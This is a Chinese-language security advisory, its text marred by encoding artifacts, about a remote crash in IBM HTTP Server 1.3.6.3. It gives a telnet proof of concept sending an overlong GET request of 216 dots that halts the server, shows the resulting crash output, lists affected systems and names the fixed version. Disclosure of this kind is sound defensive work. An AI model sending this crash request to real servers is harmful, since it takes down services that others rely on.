涉及程序:
get
描述:
通過(guò)提交超長(zhǎng)的get請(qǐng)求導(dǎo)致ibm http server遠(yuǎn)程溢出
詳細(xì):
ibm 的 http 服務(wù)器是一個(gè) web 服務(wù)器。在 windows nt 使用的版本中存在拒絕服務(wù)的漏洞。
如果提交一個(gè)超過(guò)219個(gè)字符的 get 請(qǐng)求,將導(dǎo)致服務(wù)器停止響應(yīng),并報(bào)錯(cuò)。要恢復(fù)服務(wù)正常工作需要重新啟動(dòng)應(yīng)用程序。成功的利用該漏洞,攻擊者可在受害的主機(jī)上執(zhí)行任何代碼。(但這還未得到完全證實(shí)。)
以下代碼僅僅用來(lái)測(cè)試和研究這個(gè)漏洞,如果您將其用于不正當(dāng)?shù)耐緩秸?qǐng)后果自負(fù)
$ telnet target 80
get /......(216個(gè)".")aaa http/1.0
則系統(tǒng)會(huì)報(bào)告下列錯(cuò)誤信息:
***stop:0x0000001e(0x00000005,0x804b3a51,0x00000000,0x00000000)kmode_excepti
on_not_handled.
***address 804b3a51 base at 80400000,datastamp 384d9b17-ntoskrnl.exe
注意:目標(biāo)主機(jī)運(yùn)行在windows 2000下。
受影響的系統(tǒng)
ibm http server 1.3.6.3
- turbolinux turbo linux 3.0.1
- sun solaris 2.6
- s.u.s.e. linux 6.1
- s.u.s.e. linux 6.0
- redhat linux 6.0 sparc
- redhat linux 5.2 sparc
- microsoft windows nt 4.0
- ibm aix 4.2.1
- caldera openlinux 2.2
解決方案:
ibm 已經(jīng)在 1.3.12 版本中解決了此問(wèn)題,下載地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html
新聞熱點(diǎn)
疑難解答
圖片精選